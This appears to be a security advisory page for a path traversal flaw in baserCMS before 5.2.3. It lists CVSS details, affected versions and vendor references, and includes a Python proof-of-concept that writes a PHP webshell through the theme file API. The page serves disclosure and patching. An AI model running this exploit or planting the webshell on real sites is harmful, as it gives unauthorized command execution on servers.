Security Vulnerability Report
CVE-2026-30940 CVSS 7.2 HIGH

CVE-2026-30940

Published: 2026-03-31 01:16:36
Last Modified: 2026-04-01 20:26:18

Description

baserCMS is a website development framework. Prior to version 5.2.3, a path traversal vulnerability exists in the theme file management API (/baser/api/admin/bc-theme-file/theme_files/add.json) that allows arbitrary file write. An authenticated administrator can include ../ sequences in the path parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE). This issue has been patched in version 5.2.3.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:basercms:basercms:*:*:*:*:*:*:*:* - VULNERABLE
baserCMS < 5.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://example.com/baser/api/admin/bc-theme-file/theme_files/add.json"

# Administrator session cookie (Required)
admin_cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Exploit payload: Write a webshell to the webroot using path traversal
# Adjust the number of "../" based on the directory depth
exploit_data = {
    "theme": "BcThemeSample",
    "plugin": "BaserCore",
    "path": "../../../webroot/shell.php",
    "content": "<?php system($_GET['cmd']); ?>"
}

try:
    response = requests.post(target_url, data=exploit_data, cookies=admin_cookies)
    if response.status_code == 200:
        print("[+] File write request sent successfully.")
        print("[+] Check your webshell at: /shell.php?cmd=whoami")
    else:
        print("[-] Request failed. Status code:", response.status_code)
        print(response.text)
except Exception as e:
    print(f"Error: {e}")
```

Weaknesses

CWE-22 (Path Traversal), CWE-73 (External Control of File Name or Path)

References

https://basercms.net/security/JVN_20837860 (Vendor Advisory)
https://github.com/baserproject/basercms/releases/tag/5.2.3 (Release Notes)
https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq (Exploit, Vendor Advisory)